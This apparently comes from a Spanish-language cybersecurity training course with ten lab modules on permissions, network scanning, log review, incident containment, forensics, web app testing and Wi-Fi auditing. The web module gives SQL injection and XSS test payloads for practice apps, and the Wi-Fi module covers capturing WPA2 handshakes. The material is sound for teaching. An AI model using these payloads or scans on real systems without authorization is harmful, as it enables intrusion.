Logo de SO-IN

Máster Profesional en Ciberseguridad: De 0 al master academico

Formación completa y práctica para trabajar en equipos de seguridad. Aprenderás sobre redes, sistemas, entornos en la nube, investigación forense, cumplimiento de normas y ciberseguridad con inteligencia artificial.

📊 Análisis Académico y Propuesta de Valor

Este programa te lleva paso a paso desde los fundamentos básicos hasta un nivel profesional. Aprenderás a prevenir, detectar, responder e investigar incidentes de ciberseguridad, usando estándares internacionales y entornos seguros.

Ejes de Aprendizaje

Módulos incluidos

  1. Fundamentos de Ciberseguridad
  2. Detección de Vulnerabilidades Básicas
  3. Detección y Respuesta Guiada
  4. Análisis de Tráfico de Red
  5. Hardening y Protección Proactiva
  6. Simulación de Incidentes y Plan de Respuesta
  7. Investigación Forense Digital
  8. Seguridad en Aplicaciones Web
  9. Seguridad en Redes Inalámbricas
  10. Análisis Forense Digital Básico
  11. Análisis de Tráfico Avanzado
  12. Gestión de Incidentes Avanzada
  13. Pruebas de Penetración Avanzadas
  14. Red Team contra Blue Team
  15. Seguridad en la Nube Multiplataforma
  16. Ciberseguridad Asistida con Inteligencia Artificial

Cada módulo incluye teoría, laboratorios prácticos y un entregable que podrás mostrar como parte de tu portafolio profesional.


🚀 Introducción

La ciberseguridad ya no es exclusiva de grandes empresas. Hoy es esencial para cualquier organización o profesional que maneje información digital. Aquí aprenderás a proteger sistemas, detectar amenazas y responder de forma segura.

Logros que obtendrás


💡 Sobre SO-IN

SO-IN forma a profesionales y emprendedores para que usen la tecnología de manera segura y puedan ofrecer servicios éticos de ciberseguridad. Nuestra filosofía es: claridad, práctica y acción.


🏛️ Módulo 1: Tus Primeros Pasos en Ciberseguridad: Fundamentos y Modelado de Amenazas

¡Hola! 👋 Bienvenido/a al módulo 1 de ciberseguridad. Aquí vamos a aprender a proteger tu información digital de una forma muy sencilla y práctica. No necesitas saber mucho de computadoras, ¡te guiaré en cada paso!

✅ Al final de este módulo, serás capaz de:


📚 Glosario Técnico

Antes de comenzar, aquí tienes algunos términos clave que usaremos durante el módulo. Si algo no te suena familiar, no te preocupes: lo iremos viendo con ejemplos.


🛡️ Concepto 1: Las Tres Reglas de Oro (CIA)

Imagina que tienes una caja del tesoro muy valiosa. Para protegerla, necesitas seguir tres reglas muy importantes:

  1. Confidencialidad (el Secreto): Solo tú sabes dónde está la caja y qué hay dentro. No quieres que nadie más lo vea. En digital, es como ponerle una contraseña a tus fotos para que solo tú las veas.
  2. Integridad (que no la cambien): Quieres asegurarte de que nadie pueda abrir la caja y cambiar lo que hay dentro sin que tú te des cuenta. En digital, es como tener una señal que te avisa si alguien tocó tus archivos.
  3. Disponibilidad (siempre a mano): Necesitas poder abrir tu caja cuando quieras. Si la pierdes o se rompe, el tesoro ya no está "disponible". En digital, es tener una copia de seguridad de tus archivos por si se borran.

Estas tres ideas (Confidencialidad, Integridad, Disponibilidad) son la base de la ciberseguridad.


🕵️‍♂️ Concepto 2: Saber qué proteger (Tu Inventario de Dispositivos)

Imagina que quieres proteger todas tus cosas de valor en tu casa. Lo primero es hacer una lista de todo lo que tienes, ¿verdad? Un inventario de activos es exactamente eso, pero para tus dispositivos y la información que guardan.


🛠️ Laboratorio 1: Tu Carpeta Súper Secreta (¡Protegiendo tu Confidencialidad!)

Fundamento: A esto le llamamos "dar el privilegio mínimo", es decir, darle a alguien solo lo que necesita y nada más.

Abre la Terminal (normalmente la encuentras buscando "Terminal" o "Consola" en el menú de aplicaciones).

¿Cómo sabes si funcionó? (Validación)

Para ver si tu carpeta está bien protegida, pídele a la Terminal que muestre los permisos:

Resultado esperado: Deberías ver algo así: drwx------ seguido de tu nombre de usuario. El rwx------ significa que solo tú tienes permisos, y los guiones (---) significan que nadie más puede hacer nada.

Si intentas entrar o ver el contenido desde otro usuario de Linux (si tienes uno), recibirás un error de "Permiso denegado".

🔍 Nivel Avanzado (opcional): Crea un script Bash que:

Guarda el script como crear_carpeta_secreta.sh, dale permisos de ejecución: Y ejecútalo indicando el nombre de la carpeta:

Abre PowerShell como Administrador (busca "PowerShell" en el menú de inicio, haz clic derecho y elige "Ejecutar como administrador").

¿Cómo sabes si funcionó? (Validación con el Explorador de Archivos)

Ahora, vamos a usar el Explorador de Archivos de Windows para quitar los permisos a otros. ¡Es como poner el candado con el mouse!

  1. Busca la carpeta mi_carpeta_secreta en tu disco C:.
  2. Haz clic derecho en ella y elige Propiedades.
  3. Ve a la pestaña Seguridad (icono de un candado).
  4. Haz clic en el botón Opciones avanzadas.
  5. Desmarca la casilla "Heredar permisos del objeto primario".
  6. Elige "Quitar todos los permisos heredados de este objeto".
  7. Ahora verás que solo quedan SYSTEM y Administrators. Haz clic en Agregar.
  8. Haz clic en Seleccionar una entidad de seguridad, escribe el nombre de tu usuario (con el que inicias sesión), presiona Comprobar nombres y luego Aceptar.
  9. Asigna a tu usuario el permiso de Control total y confirma con Aceptar.
  10. Haz clic en Aplicar y luego Aceptar en todas las ventanas abiertas.

Resultado esperado: Si otro usuario (que no sea el administrador ni SYSTEM) intenta abrir esa carpeta, Windows mostrará que no tiene permisos. ¡Has protegido tu secreto!

🔍 Nivel Avanzado (opcional): Valida por consola con:

Y guarda la salida en un TXT:


🛠️ Laboratorio 2: "Mis Aparatos Conectados" (¡Creando un Inventario Básico!)

Fundamento: Vamos a escanear tu red doméstica para ver qué dispositivos están conectados y encendidos.

Abre la Terminal de nuevo.

Resultado esperado: Busca una línea que diga inet y un número como 192.168.1.10/24. El 192.168.1.0/24 es la "dirección de tu barrio digital".

Resultado esperado: Verás una lista con "Host is up" seguida de direcciones IP como 192.168.1.1, 192.168.1.15. Cada IP representa un dispositivo conectado en tu red (router, celular, PC, etc.).

🔍 Nivel Avanzado (opcional): - Ver direcciones MAC y fabricantes de los dispositivos detectados:

- Analizar qué paquetes envía el escaneo: - Guardar el resultado del escaneo en un archivo de texto:

Abre PowerShell de nuevo (no hace falta que sea como administrador esta vez).

Resultado esperado: Busca la línea "Dirección IPv4" (ej. 192.168.1.10). Los primeros tres números (192.168.1) son la parte importante de tu red.

Resultado esperado: Verás una lista como: 192.168.1.1 está activo 192.168.1.15 está activo Cada línea indica un dispositivo encendido en tu red. Algunos pueden no responder por firewall.

🔍 Nivel Avanzado (opcional):

  • Guardar la salida en un archivo:
  • Listar las entradas en caché ARP:

✅ Trabajo Práctico del Módulo 1

📦 Instrucciones de Entrega

Para este módulo, deberás entregar evidencias de que realizaste correctamente los ejercicios.

📦 Formato de Entrega

Sube un único archivo comprimido `modulo1_Apellido_Nombre.zip` que contenga las siguientes capturas:

  1. Laboratorio 1:
    • Linux: captura de pantalla mostrando el resultado de ls -ld mi_carpeta_secreta.
    • Windows: captura de pantalla de las Opciones avanzadas de seguridad de la carpeta mi_carpeta_secreta.
  2. Laboratorio 2:
    • Linux: captura de pantalla con la salida del escaneo nmap -sn.
    • Windows: captura de pantalla con la lista de IPs activas encontrada por PowerShell.

📏 Rúbrica de Evaluación

📝 Checklist de Entrega

Antes de subir, asegúrate de:

⚠️ Notas éticas y accesibilidad


📘 Conexión con Estándares (Contexto profesional)

Lo que hiciste en este módulo alinea con prácticas de **ISO/IEC 27001** (control de acceso e inventario de activos) y con el pilar **Identify** del **NIST Cybersecurity Framework** (gobierno de activos). Esto te va acostumbrando a un lenguaje profesional desde el inicio.


🚀 Cierre del Módulo

Hoy aprendiste a proteger archivos y a identificar los dispositivos en tu red. Estos son los cimientos de un profesional en ciberseguridad. En el próximo módulo, pasaremos a detectar vulnerabilidades comunes y a implementar defensas básicas (cifrado, contraseñas robustas, actualización segura y endurecimiento del sistema). Paso a paso, irás construyendo las habilidades para convertirte en un/a verdadero/a Master en Ciberseguridad.

🏛️ Módulo 2: Detección de Vulnerabilidades Básicas

En este módulo aprenderás a identificar servicios expuestos, versiones y posibles vulnerabilidades en entornos controlados. Trabajaremos de forma segura y ética, con evidencias reproducibles y priorización basada en riesgo.

✅ Al final de este módulo, serás capaz de:


📚 Glosario Técnico


🧰 Prerrequisitos del laboratorio

Estos son los requisitos para que puedas realizar las actividades del módulo.


🎯 Concepto 1: Ciclo de Gestión de Vulnerabilidades

La gestión de vulnerabilidades sigue un ciclo: descubrimiento → análisis/triage → remediación → verificación. La enumeración (nmap, banners, versiones) no es explotación; su objetivo es identificar exposición y priorizar corrección. La severidad suele referenciar CVSS (baja, media, alta, crítica) y debe cruzarse con el contexto del activo.


🛠️ Laboratorio 1 — Descubrimiento y escaneo de puertos

Fundamento: Identificar superficie de ataque (servicios expuestos) como base de cualquier evaluación.

Abre la Terminal en tu sistema Linux.

Resultado esperado (ejemplo):

        PORT   STATE SERVICE
        22/tcp open  ssh
        80/tcp open  http
  

🔍 Nivel avanzado (opcional):

  • Escanear todos los puertos TCP:
  • Incluir escaneo UDP (requiere permisos y puede tardar más):

Abre PowerShell (puede ser sin privilegios de administrador, salvo para instalar programas).

Resultado esperado: Lista de puertos abiertos y servicios asociados en la IP analizada.

🔍 Nivel avanzado (opcional):

  • Escanear todos los puertos TCP:
  • Si nmap no está en el PATH, ejecutar con la ruta completa:

🕵️‍♂️ Laboratorio 2 — Enumeración de servicios y banners

Fundamento: Versiones y metadatos permiten asociar vulnerabilidades conocidas.

Abre la Terminal en tu sistema Linux.

Resultado esperado (ejemplo):

        PORT   STATE SERVICE VERSION
        80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
  

🔍 Nivel avanzado (opcional): Añade scripts NSE seguros para ampliar la información sin explotación:

Abre PowerShell (no es necesario como administrador en este caso).

Resultado esperado: Lista de servicios con su número de versión y metadatos relevantes.

🔍 Nivel avanzado (opcional): Ejecuta con NSE seguros para ampliar información:

Si openssl no está instalado en Windows, puedes omitir ese paso o instalarlo mediante Win32 OpenSSL.


🧾 Laboratorio 3 — Normalización de hallazgos

Fundamento: Estandarizar datos facilita priorizar y comunicar.

Crea un CSV con este encabezado exacto y registra tus hallazgos:

Host,IP,Puerto,Protocolo,Servicio,Version,Evidencia

🎯 Laboratorio 4 — Cruce con CVE y priorización (sin explotación)

Fundamento: Priorizar por severidad (CVSS) y contexto del activo.

  1. Investiga si la combinación Servicio + Versión tiene CVEs conocidas (usa fuentes oficiales).
  2. Registra en un CSV con esta cabecera exacta:
    Host,IP,Servicio,Version,CVE,CVSS Base,Severidad (Baja/Media/Alta/Crítica),Referencia,Notas
  3. Prioriza: CVSS ≥ 7.0 = Alta/Crítica; 4.0–6.9 = Media; < 4.0 = Baja (ajusta por criticidad del activo).

🛡️ Laboratorio 5 — Plan de remediación

Fundamento: Cerrar el ciclo: acción, responsable y fecha objetivo.

Crea un CSV con esta cabecera exacta:

Hallazgo/CVE,Severidad,Recomendación,Propietario,Fecha objetivo,Estado

✅ Trabajo Práctico del Módulo 2

📦 Instrucciones de Entrega

Para este módulo, deberás entregar un único archivo comprimido con todas las evidencias de los laboratorios.

📦 Formato de Entrega

Sube `modulo2_Apellido_Nombre.zip` con esta estructura:

modulo2_Apellido_Nombre.zip
├─ escaneo/
│  ├─ hosts_activos.txt
│  └─ puertos_<IP>.txt
├─ enumeracion/
│  ├─ enum_<IP>.txt
│  └─ http_headers_<IP>.txt (si aplica)
├─ tablas/
│  ├─ hallazgos.csv
│  └─ vulnerabilidades.csv
└─ remediacion/
   └─ plan_remediacion.csv

📏 Rúbrica de Evaluación

📝 Checklist de Entrega

Antes de subir, asegúrate de:

⚠️ Notas éticas y accesibilidad


📘 Conexión con Estándares (contexto profesional)

La gestión de vulnerabilidades se alinea con prácticas de **NIST CSF** (ID.AM, PR.AC, DE.CM), **ISO/IEC 27001/27002** y **CIS Controls v8**. Esto te acostumbra a un lenguaje profesional desde el inicio.


🚀 Cierre del Módulo

Hoy aprendiste a identificar servicios expuestos, versiones, y asociar vulnerabilidades conocidas para priorizar su corrección. En el próximo módulo, pasaremos a detectar incidentes en tiempo real y responder de forma segura para evitar su propagación. Paso a paso, irás construyendo las habilidades para convertirte en un/a verdadero/a Master en Ciberseguridad.

🏛️ Módulo 3: Detección y Respuesta Guiada

En este módulo aprenderás a detectar incidentes en tiempo real y responder de forma segura para evitar propagación y preservar evidencia. Practicaremos detección en logs, análisis de procesos y conexiones, y acciones de contención en entornos controlados.

✅ Al final de este módulo, serás capaz de:


📚 Glosario Técnico


🧰 Prerrequisitos del laboratorio

Estos son los requisitos para que puedas realizar las actividades del módulo.


🎯 Concepto 1: Detección de Incidentes

La detección de incidentes se basa en el monitoreo de procesos, conexiones y logs para identificar comportamientos anómalos que podrían indicar un compromiso del sistema.


🛠️ Laboratorio 1 — Monitoreo de procesos y conexiones

Fundamento: Procesos o conexiones inusuales pueden ser señales tempranas de compromiso.


        # Ver procesos ordenados por uso de CPU/memoria
        top

        # Listar conexiones y procesos asociados
        sudo netstat -tulpn

        # Filtrar conexiones establecidas hacia IP externas
        sudo netstat -tupn | grep ESTABLISHED
    

Resultado esperado: Identificar un PID sospechoso y registrar la IP de destino.

Nivel avanzado opcional: Combinar lsof -i con ps -fp <PID> para obtener detalles completos del proceso (usuario, comando, archivos abiertos) y redirigir la salida a un archivo de reporte. Ejemplo:

lsof -i -P -n | grep ESTABLISHED > reporte_conexiones.txt


        # Listar procesos por uso de CPU
        Get-Process | Sort-Object CPU -Descending

        # Mostrar conexiones activas
        netstat -ano

        # Filtrar conexiones establecidas
        netstat -ano | findstr ESTABLISHED
    

Resultado esperado: Identificar un PID desconocido y registrar IP remota y puerto.

Nivel avanzado opcional: Relacionar PID con proceso usando Get-Process -Id <PID> y generar un reporte CSV:

Get-Process -Id <PID> | Export-Csv reporte_proceso.csv -NoTypeInformation


🕵️ Laboratorio 2 — Análisis rápido de logs

Fundamento: Los logs registran intentos fallidos y accesos inusuales.


        # Intentos fallidos de login
        sudo grep "Failed password" /var/log/auth.log

        # Accesos SSH exitosos
        sudo grep "Accepted password" /var/log/auth.log
    

Resultado esperado: Listar IPs con múltiples intentos fallidos.

Nivel avanzado opcional: Crear un script que lea el log de autenticación, cuente intentos fallidos por IP y genere lista de bloqueo automática usando iptables. Ejemplo:

grep "Failed password" /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr > intentos_por_ip.txt


        # Inicios de sesión fallidos (ID 4625)
        Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} | Format-Table TimeCreated, Message -AutoSize

        # Inicios de sesión exitosos (ID 4624)
        Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} | Format-Table TimeCreated, Message -AutoSize
    

Resultado esperado: Detectar múltiples fallos de un mismo origen.

Nivel avanzado opcional: Exportar eventos a CSV y filtrar en Excel para patrones:

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} | Export-Csv eventos_fallidos.csv -NoTypeInformation


🛡️ Laboratorio 3 — Contención inmediata

Fundamento: Aislar y detener un proceso malicioso minimiza daños.


        # Deshabilitar red
        sudo ip link set eth0 down

        # Finalizar proceso
        sudo kill -9 

        # Rehabilitar red
        sudo ip link set eth0 up
    

Resultado esperado: Equipo aislado y proceso terminado.

Nivel avanzado opcional: Script que identifique procesos con conexiones externas y los finalice, registrando acciones:

for pid in $(netstat -tupn | grep ESTABLISHED | awk '{print $7}' | cut -d/ -f1); do
        echo "$(date) - Finalizando proceso $pid" >> contencion.log
        kill -9 $pid
        done
    


        # Deshabilitar red
        Disable-NetAdapter -Name "Ethernet" -Confirm:$false

        # Finalizar proceso
        Stop-Process -Id  -Force

        # Habilitar red
        Enable-NetAdapter -Name "Ethernet"
    

Resultado esperado: Red deshabilitada y proceso finalizado.

Nivel avanzado opcional: Script que detecte procesos con conexiones externas y los detenga, guardando log:

$conexiones = netstat -ano | findstr ESTABLISHED
        foreach ($c in $conexiones) {
        $pid = ($c -split '\s+')[-1]
        Stop-Process -Id $pid -Force
        "$(Get-Date) - Finalizado proceso $pid" | Out-File contencion.log -Append
        }
    


✅ Trabajo Práctico del Módulo 3

📦 Instrucciones de Entrega

Para este módulo, deberás entregar un único archivo comprimido con todas las evidencias de los laboratorios.

📦 Formato de Entrega

Sube modulo3_Apellido_Nombre.zip con esta estructura:

modulo3_Apellido_Nombre.zip
├─ deteccion/
│  ├─ procesos.txt
│  ├─ conexiones.txt
├─ logs/
│  └─ analisis_logs.txt
├─ contencion/
│  ├─ captura_aislamiento.png
│  └─ captura_kill.png
└─ resumen/
   └─ resumen_incidente.txt

📏 Rúbrica de Evaluación

📝 Checklist de Entrega

Antes de subir, asegúrate de:

⚠️ Notas éticas y accesibilidad


📘 Conexión con Estándares (contexto profesional)

Lo que hiciste en este módulo se alinea con las prácticas de gestión de incidentes del **NIST SP 800-61**, **ISO/IEC 27035** y el **CIS Controls v8**.


🚀 Cierre del módulo

Ahora sabes detectar y responder a incidentes de forma segura y documentada. Esto sienta la base para el Módulo 4: Hardening y Protección Proactiva.

🏛️ Módulo 4: Análisis de Tráfico de Red

En este módulo aprenderás a capturar, analizar y filtrar tráfico de red para detectar patrones sospechosos, identificar protocolos y comprender el flujo de datos en un entorno controlado. Usaremos herramientas como Wireshark y tcpdump, siempre respetando las buenas prácticas y la legalidad.

🧰 Prerrequisitos del laboratorio

🎯 Objetivos de Aprendizaje

📚 Glosario Técnico

📚 Marco teórico (síntesis)

El análisis de tráfico de red es clave para la detección temprana de incidentes. Herramientas como Wireshark permiten ver el detalle de cada paquete, incluyendo encabezados y datos, mientras que tcpdump permite capturas rápidas desde la terminal. Filtrar tráfico es esencial para centrarse en eventos relevantes y reducir ruido.

🛠️ Laboratorio 1 — Captura de tráfico

Abre la terminal y ejecuta:


        # Capturar tráfico en la interfaz eth0 y guardarlo en captura.pcap
        sudo tcpdump -i eth0 -w captura.pcap
      

Abre Wireshark, selecciona la interfaz y presiona "Iniciar captura".

Guarda el archivo como captura.pcap para su análisis posterior.

🧪 Laboratorio 2 — Filtrado de tráfico


        # Capturar solo tráfico HTTP
        sudo tcpdump -i eth0 tcp port 80 -w http_traffic.pcap
      

En Wireshark, usa el filtro:


        tcp.port == 80
      

⚠️ Errores Comunes

🔗 Referencias y Marcos

📋 Trabajo Práctico del Modulo 4

  1. Captura tráfico HTTP y DNS en tu red local durante 2 minutos.
  2. Filtra solo las solicitudes DNS y guarda la salida en un archivo CSV exportado desde Wireshark.
  3. Identifica 3 IPs más consultadas y documenta su dominio asociado.

📦 Formato de Entrega


        modulo4_Apellido_Nombre.zip
        ├─ capturas/
        │  ├─ http_dns.pcap
        │  ├─ dns_filtrado.csv
        └─ reporte/
        └─ analisis.txt
  

📏 Rúbrica de Evaluación

✅ Checklist de Calidad

🔒 Notas Éticas y Accesibilidad

📘 Conexión con Estándares (contexto profesional)

Lo que hiciste en este módulo se alinea con el NIST Cybersecurity Framework (Detect) y con el control 12.4 de ISO/IEC 27002, reforzando competencias en monitoreo y análisis de red.

🚀 Cierre del Módulo

Ahora eres capaz de capturar y filtrar tráfico de red de forma segura, distinguir patrones normales de los anómalos y generar evidencias útiles para investigación o respuesta ante incidentes. En el próximo módulo abordaremos Hardening y Protección Proactiva.

🏛️ Módulo 5: Hardening y Protección Proactiva

En este módulo aprenderás a reforzar la seguridad de sistemas y redes aplicando buenas prácticas de configuración, control de acceso y reducción de superficie de ataque. Implementarás medidas proactivas para prevenir incidentes antes de que ocurran.

✅ Al final de este módulo, serás capaz de:


📚 Glosario Técnico


🧰 Prerrequisitos del laboratorio


🛠️ Laboratorio 1 — Actualización y limpieza de servicios

Fundamento: Mantener el sistema actualizado y libre de servicios innecesarios reduce vulnerabilidades.


🛠️ Laboratorio 2 — Configuración de firewall

Fundamento: Controlar el tráfico de red previene accesos no autorizados.


✅ Trabajo Práctico del Módulo 5

📦 Instrucciones de Entrega

Entrega un único archivo comprimido con evidencias y configuraciones aplicadas.

📦 Formato de Entrega

modulo5_Apellido_Nombre.zip
├─ evidencias/
│  ├─ servicios_antes.txt
│  ├─ servicios_despues.txt
│  ├─ reglas_firewall.txt
└─ reporte/
   └─ analisis_hardening.txt

📏 Rúbrica de Evaluación

📝 Checklist de Entrega

⚠️ Notas éticas y accesibilidad


📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27002 (9.1, 13.1, 13.2), CIS Controls v8 (4, 5, 6) y NIST CSF (Protect: PR.IP, PR.AC, PR.PT), fortaleciendo la postura de seguridad preventiva.


🚀 Cierre del Módulo

Ahora sabes aplicar técnicas de hardening para reducir la superficie de ataque, configurar un firewall básico y reforzar las defensas del sistema. En el próximo módulo abordaremos Simulación de Incidentes y Planes de Respuesta.

🏛️ Módulo 6: Simulación de Incidentes y Plan de Respuesta

En este módulo aprenderás a ejecutar simulaciones controladas de incidentes de seguridad para poner a prueba la capacidad de detección, respuesta y recuperación de tu organización. Implementarás procedimientos claros y medibles, alineados con buenas prácticas internacionales.


📚 Glosario Técnico


🧰 Prerrequisitos del laboratorio


🛠️ Laboratorio 1 — Simulación de ataque controlado

Fundamento: La práctica controlada mejora la reacción ante incidentes reales.


🛠️ Laboratorio 2 — Ejecución del plan de respuesta

Fundamento: Tener un plan documentado reduce el impacto del incidente.

  1. Identificar el incidente (detectar en logs, alertas del SIEM, reportes internos).
  2. Contener la amenaza (aislar el sistema afectado, cortar conexiones sospechosas).
  3. Erradicar la causa raíz (eliminar malware, cerrar vulnerabilidades).
  4. Recuperar el servicio (restaurar backups, habilitar sistemas).
  5. Registrar toda la evidencia y las acciones tomadas.

✅ Trabajo Práctico del Módulo 6

📦 Instrucciones de Entrega

Entrega un único archivo comprimido con todos los pasos, capturas y registros del ejercicio.

📦 Formato de Entrega

modulo6_Apellido_Nombre.zip
    ├─ simulacion/
    │  ├─ evidencia_trafico.txt
    │  ├─ logs_detectados.txt
    ├─ respuesta/
    │  ├─ plan_respuesta.pdf
    └─ informe/
    └─ post_mortem.txt

📏 Rúbrica de Evaluación

📝 Checklist de Entrega

⚠️ Notas éticas y accesibilidad


📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27035 (Gestión de Incidentes), NIST CSF (Detect: DE.AE, DE.CM, DE.DP; Respond: RS.RP, RS.MI, RS.CO) y CIS Controls v8 (17, 18), reforzando la preparación ante incidentes reales.


🚀 Cierre del Módulo

Ahora dominas la ejecución de simulaciones de incidentes y planes de respuesta. En el próximo módulo abordarás Investigación Forense Digital para profundizar en el análisis post-incidente.

🏛️ Módulo 7: Investigación Forense Digital

En este módulo aprenderás a realizar análisis forense digital para recolectar, preservar y examinar evidencias en sistemas comprometidos. Aplicarás metodologías reconocidas y herramientas especializadas para asegurar la integridad y validez de la información.


📚 Glosario Técnico


🧰 Prerrequisitos del laboratorio


🛠️ Laboratorio 1 — Creación de imagen forense

Fundamento: Una imagen forense permite trabajar sin modificar la evidencia original.


🛠️ Laboratorio 2 — Análisis de imagen y memoria

Fundamento: Examinar archivos, registros y memoria en busca de indicios de actividad maliciosa.

  1. Abrir la imagen en Autopsy o Sleuth Kit y revisar:
    • Archivos modificados recientemente.
    • Restos de malware o ejecutables sospechosos.
    • Historial de navegación y correos electrónicos.
  2. Con Volatility, analizar un volcado de memoria:

✅ Trabajo Práctico del Módulo 7

📦 Instrucciones de Entrega

Entrega un único archivo comprimido con todas las evidencias, análisis y reporte final.

📦 Formato de Entrega

modulo7_Apellido_Nombre.zip
    ├─ imagen/
    │  ├─ disk_image.dd
    │  ├─ hash.txt
    ├─ memoria/
    │  ├─ memoria.vmem
    │  ├─ analisis_volatility.txt
    └─ informe/
       └─ reporte_forense.pdf

📏 Rúbrica de Evaluación

📝 Checklist de Entrega

⚠️ Notas éticas y accesibilidad


📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27037 (Directrices para identificación, recolección, adquisición y preservación de evidencias digitales), NIST SP 800-86 (Guide to Integrating Forensic Techniques into Incident Response) y CIS Controls v8 (8, 13, 17), asegurando que los procesos forenses cumplan estándares internacionales.


🚀 Cierre del Módulo

Con estas habilidades podrás llevar a cabo investigaciones forenses digitales completas y documentadas, fortaleciendo la respuesta y prevención ante incidentes. El siguiente módulo se centrará en Pruebas de Penetración Ética para evaluar la seguridad de sistemas de manera proactiva.

🏛️ Módulo 8: Seguridad en Aplicaciones Web

En este módulo aprenderás a identificar, evaluar y mitigar vulnerabilidades comunes en aplicaciones web. Utilizaremos entornos de prueba seguros (DVWA, Juice Shop) y herramientas como OWASP ZAP y Burp Suite, siguiendo las mejores prácticas del OWASP Top 10 y normas internacionales.

🧰 Prerrequisitos del laboratorio

🎯 Objetivos de Aprendizaje

📚 Glosario Técnico

📚 Marco teórico (síntesis)

Las aplicaciones web son uno de los vectores más comunes de ataque. El proyecto OWASP documenta las principales amenazas y contramedidas. Las pruebas deben realizarse únicamente en entornos de laboratorio, siguiendo metodologías como OWASP Testing Guide.

🛠️ Laboratorio 1 — Escaneo inicial con OWASP ZAP

Configura un proxy en tu navegador para dirigir el tráfico a OWASP ZAP y realiza un escaneo pasivo sobre DVWA o Juice Shop.

🕵️‍♂️ Laboratorio 2 — Pruebas de Inyección SQL

En DVWA (nivel bajo), utiliza entradas como ' OR '1'='1 para manipular consultas y observa el resultado.

💻 Laboratorio 3 — Pruebas XSS

Inserta un payload como <script>alert('XSS')</script> en formularios y verifica su ejecución.

📋 Trabajo Práctico del Módulo 8

📦 Instrucciones de entrega

  1. Documentar al menos 3 vulnerabilidades encontradas (tipo, ubicación, prueba realizada, evidencia).
  2. Proponer una mitigación para cada hallazgo.
  3. Generar un reporte en formato PDF con capturas y análisis.

📦 Formato de Entrega


    modulo8_Apellido_Nombre.zip
    ├─ evidencias/
    │  ├─ capturas/
    │  └─ report.pdf
    └─ notas.txt
  

📏 Rúbrica de Evaluación

✅ Checklist de Calidad

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con el OWASP Top 10, ISO/IEC 27034 (Seguridad en aplicaciones), y el pilar Protect del NIST Cybersecurity Framework. Refuerza competencias en pruebas seguras y documentación técnica.

🚀 Cierre del Módulo

Has completado el Módulo 8. Ahora estás listo para aplicar técnicas de análisis y protección de aplicaciones web de forma profesional y ética.

🏛️ Módulo 9: Seguridad en Redes Inalámbricas

En este módulo aprenderás a evaluar la seguridad de redes Wi-Fi, identificar configuraciones inseguras y aplicar contramedidas efectivas. Trabajaremos con herramientas de auditoría inalámbrica en entornos controlados y analizaremos protocolos como WEP, WPA, WPA2 y WPA3.

🧰 Prerrequisitos del laboratorio

🎯 Objetivos de Aprendizaje

📚 Glosario Técnico

📚 Marco teórico (síntesis)

Las redes inalámbricas son vulnerables a ataques de escucha pasiva, suplantación de AP y fuerza bruta. La elección del protocolo y configuración influye directamente en la resistencia a ataques. WPA3 introduce mejoras como SAE, pero su adopción aún es gradual.

🛠️ Laboratorio 1 — Detección y análisis de redes

Identifica redes abiertas o con cifrados inseguros y anota su BSSID, canal y protocolo.

🕵️‍♂️ Laboratorio 2 — Captura de handshakes

Guarda el archivo captura.cap para análisis posterior en Wireshark o con aircrack-ng.

🔍 Laboratorio 3 — Análisis de tráfico inalámbrico

Abre captura.cap en Wireshark, filtra por eapol y analiza el intercambio de autenticación.

📋 Trabajo Práctico del Módulo 9

📦 Instrucciones de Entrega

  1. Realizar detección de redes y clasificar según seguridad (abierta, WEP, WPA, WPA2, WPA3).
  2. Capturar un handshake WPA2 y documentar el proceso (sin crackear contraseñas reales).
  3. Proponer mejoras de configuración para una red insegura detectada.

📦 Formato de Entrega


    modulo9_Apellido_Nombre.zip
    ├─ capturas/
    │  ├─ listado_redes.txt
    │  ├─ captura.cap
    │  └─ evidencias.png
    └─ recomendaciones.txt
  

📏 Rúbrica de Evaluación

✅ Checklist de Calidad

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27033 (Seguridad en redes), NIST SP 800-153 (Guía para seguridad de redes inalámbricas) y el pilar Protect del NIST Cybersecurity Framework. Refuerza habilidades prácticas en protección de entornos Wi-Fi.

🚀 Cierre del Módulo

Has completado el Módulo 9. Ahora dominas las técnicas para evaluar y mejorar la seguridad de redes inalámbricas de forma controlada y ética.

🏛️ Módulo 10: Análisis Forense Digital Básico

En este módulo aprenderás a preservar, adquirir y analizar evidencias digitales en un entorno controlado, siguiendo las mejores prácticas de la disciplina forense y garantizando la cadena de custodia. Nos centraremos en análisis de discos, memoria y registros de sistema usando herramientas libres.


📚 Glosario Técnico


🧰 Prerrequisitos del laboratorio


🛠️ Laboratorio 1 — Adquisición de disco

Fundamento: La adquisición bit a bit preserva la integridad del medio original para análisis posterior.


🛠️ Laboratorio 2 — Análisis de imagen

Fundamento: Analizar una copia forense evita modificaciones sobre la evidencia original.

  1. Abrir Autopsy → New Case → Add Data Source → Disk Image.
  2. Explorar artefactos: archivos borrados, historial de navegación, metadatos.
  3. Exportar hallazgos relevantes y documentarlos.

🛠️ Laboratorio 3 — Análisis de memoria RAM

Fundamento: El análisis de memoria permite identificar procesos y conexiones activas al momento de la captura.


✅ Trabajo Práctico del Módulo 10

📦 Instrucciones de Entrega

Entrega un único archivo comprimido con todas las evidencias, análisis y reporte final del ejercicio.

📦 Formato de Entrega

modulo10_Apellido_Nombre.zip
    ├─ disco/
    │  ├─ imagen_sdb.dd
    │  ├─ hash.txt
    ├─ memoria/
    │  ├─ memoria.raw
    │  ├─ analisis_memoria.txt
    └─ informe/
       └─ reporte_forense.pdf

📏 Rúbrica de Evaluación

📝 Checklist de Entrega

⚠️ Notas éticas y accesibilidad


📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27037 (Directrices para identificación, recolección y preservación de evidencias digitales), NIST SP 800-86 (Guide to Integrating Forensic Techniques into Incident Response) y CIS Controls v8 (8, 13, 17), asegurando que los procesos forenses cumplan estándares internacionales.


🚀 Cierre del Módulo

